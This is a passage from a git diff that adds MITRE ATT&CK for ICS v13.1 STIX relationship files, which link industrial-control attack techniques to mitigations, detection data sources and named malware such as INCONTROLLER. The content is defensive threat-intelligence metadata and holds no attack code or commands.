"relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34.json new file mode 100644 index 0000000000000000000000000000000000000000..ab3becb974fd864ae1542d9ab4ac09bda34fe28f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--60fdf5a9-be77-4b23-92e8-e41a283a72c6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "This technique may not be effectively mitigated against, consider controls for assets and processes that lead to the use of this technique.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17fdec71-98e8-4314-a1be-037edede58bd.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17fdec71-98e8-4314-a1be-037edede58bd.json new file mode 100644 index 0000000000000000000000000000000000000000..738e9573c91ba2da30591718791eab55b623278c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--17fdec71-98e8-4314-a1be-037edede58bd.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--6876f50a-c39a-4745-9c2d-e714e912d3bd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--17fdec71-98e8-4314-a1be-037edede58bd", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:26:48.171Z", + "description": "Devices that allow remote management of firmware should require authentication before allowing any changes. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--18ef2d69-d11a-4d31-a803-da989c4073f7.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--18ef2d69-d11a-4d31-a803-da989c4073f7.json new file mode 100644 index 0000000000000000000000000000000000000000..a01d66cc3f4b14b5111d7965accf5ef92a959a78 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--18ef2d69-d11a-4d31-a803-da989c4073f7.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--5de0612c-ed06-41c2-8498-8df4edc35ddc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--18ef2d69-d11a-4d31-a803-da989c4073f7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.096Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--193c3cd3-0b22-4839-a1fa-413aee61e882.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--193c3cd3-0b22-4839-a1fa-413aee61e882.json new file mode 100644 index 0000000000000000000000000000000000000000..d0cdbd27ef1bb81ead2c1db72458d9f75c225a20 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--193c3cd3-0b22-4839-a1fa-413aee61e882.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--a4abda3f-c184-4ec3-8917-ab1ce4488216", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--193c3cd3-0b22-4839-a1fa-413aee61e882", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:40.378Z", + "description": "Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19ab6776-42de-48af-975a-568d31a3bb66.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19ab6776-42de-48af-975a-568d31a3bb66.json new file mode 100644 index 0000000000000000000000000000000000000000..91efe8700cc98e10d3da96b15f2a3f06b4fc8cc5 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19ab6776-42de-48af-975a-568d31a3bb66.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--b54623a8-17bb-4f74-a58e-3f9c70498b7a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--19ab6776-42de-48af-975a-568d31a3bb66", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.152Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016) (Citation: N/A)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "N/A", + "description": "N/A Department of Homeland Security 2016, September Retrieved. 2020/09/25 Alarm Management for Process Control Retrieved. 2020/09/25 ", + "url": "https://www.exida.com/images/uploads/18492275-Alarm-Management-for-Process-Control.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348.json new file mode 100644 index 0000000000000000000000000000000000000000..434a1770a86f1b3bea0a7331971f0d7592fd98b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--16fbe2e3-8646-420c-84c8-304b2b19d6df", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--19c0d2bc-8de9-47c3-a1ee-63abc07c4348", + "created": "2022-09-28T21:18:55.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:17:21.181Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can send custom Modbus commands to write register values on Schneider PLCs.(Citation: CISA-AA22-103A) \n\n[INCONTROLLER](https://attack.mitre.org/software/S1045) can send write tag values on OPC UA servers.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68.json new file mode 100644 index 0000000000000000000000000000000000000000..a5bc9f66388f9484cdd6173d0560551ade0ca4e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68.json @@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--71fb326d-622c-4b5d-97c5-6d0cbfcbed54", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Ensure all browsers and plugins are kept updated to help prevent the exploit phase of this technique. Use modern browsers with security features enabled.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1aa02c37-973e-46bd-ab45-609463e514e9.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1aa02c37-973e-46bd-ab45-609463e514e9.json new file mode 100644 index 0000000000000000000000000000000000000000..aea67f7265c26d89e9503b2662bab0f699ce0b75 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1aa02c37-973e-46bd-ab45-609463e514e9.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--a7d96f1c-eefe-4e2e-8449-a4fc68c5bfa6", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1aa02c37-973e-46bd-ab45-609463e514e9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious files.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1acccbe8-64e1-49ad-87df-215d5c87f050.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1acccbe8-64e1-49ad-87df-215d5c87f050.json new file mode 100644 index 0000000000000000000000000000000000000000..15e336fdd62f75320187f491e27242cbc6cd97a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--1acccbe8-64e1-49ad-87df-215d5c87f050.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--cb0c9fe9-1593-428b-a538-bad4c2ed03f6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--1acccbe8-64e1-49ad-87df-215d5c87f050", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:42:43.105Z", + "description": "Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa.json new file mode 100644 index 0000000000000000000000000000000000000000..7963a3bc7d52c1cee681f367790e07e8387d3bad --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--9090d35e-15ef-4c95-ae7c-c6cb8269b1f7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa", + "created": "2022-09-27T16:35:12.372Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:35.207Z", + "description": "Monitor for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4.json new file mode 100644 index 0000000000000000000000000000000000000000..459cda2c82929c8db629b3d3476883f37775b76b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--0b8f62fa-1bb5-4644-8a63-3aae9d3f1f72", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c664bb6c-59f0-4b31-bbb4-ef66fca933d4", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:39.703Z", + "description": "Monitor for newly executed processes that depend on user interaction, especially for applications that can embed programmatic capabilities (e.g., Microsoft Office products with scripts, installers, zip files). This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c8dd2735-bd04-4413-847d-316b77c6de19.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c8dd2735-bd04-4413-847d-316b77c6de19.json new file mode 100644 index 0000000000000000000000000000000000000000..d3bd0d1423f730e212a357b2ce4af501f4cc6f14 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--c8dd2735-bd04-4413-847d-316b77c6de19.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--85b1470c-af24-49cd-aeb4-e7906ef10aa6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--c8dd2735-bd04-4413-847d-316b77c6de19", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:23:14.457Z", + "description": "Network allowlists can be implemented through either host-based files or system host files to specify what external connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in the [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b.json new file mode 100644 index 0000000000000000000000000000000000000000..1a75d42ac0b9ebe8c526371f9753032857b1128e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--94e536a9-71b0-4035-b79e-c4cbcb7574f5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b", + "type": "relationship", + "created": "2021-10-04T20:52:20.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Lazarus KillDisk April 2018", + "description": "K\u00e1lnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.", + "url": "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + } + ], + "modified": "2021-10-04T20:54:09.057Z", + "description": "(Citation: ESET Lazarus KillDisk April 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "target_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1.json new file mode 100644 index 0000000000000000000000000000000000000000..dee28728f59f4c79148988fb18317c07fc1aff49 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--30403215-3aa6-47ab-8ae2-288fbcce4604", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cd297a7b-4b02-407e-a798-e36fef4cf3a1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.072Z", + "relationship_type": "mitigates", + "description": "Implement network allowlists to minimize serial comm port access to only authorized hosts, such as comm servers and RTUs.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d16e8909-d055-4174-aeb1-22c0613b2f73.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d16e8909-d055-4174-aeb1-22c0613b2f73.json new file mode 100644 index 0000000000000000000000000000000000000000..7175beae801cb1a439fdc52a5f4a6bd4964da291 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d16e8909-d055-4174-aeb1-22c0613b2f73.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--bc965a57-5660-48fe-9b73-6db3cc45c261", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d16e8909-d055-4174-aeb1-22c0613b2f73", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:53:55.028Z", + "description": "Disable unnecessary legacy network protocols that may be used for AiTM if applicable.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab.json new file mode 100644 index 0000000000000000000000000000000000000000..b61587d6ecdf4cebc0c08dcb86c698db9c26bd36 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--459c5e48-3de5-4057-aa18-40c0c0f2519f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:31:22.665Z", + "description": "Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--dadfed22-d70c-482b-9026-964396d75484.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--dadfed22-d70c-482b-9026-964396d75484.json new file mode 100644 index 0000000000000000000000000000000000000000..71abd1c196c501c9fa8bd8ad458351883caf5725 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--dadfed22-d70c-482b-9026-964396d75484.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--0d778367-fc09-4e45-8ba8-7f9a2ec78492", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dadfed22-d70c-482b-9026-964396d75484", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:42:28.053Z", + "description": "Monitor for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938.json new file mode 100644 index 0000000000000000000000000000000000000000..78790de35de80c9db2cfd5413d34f7848b71d037 --- /dev/null +++ 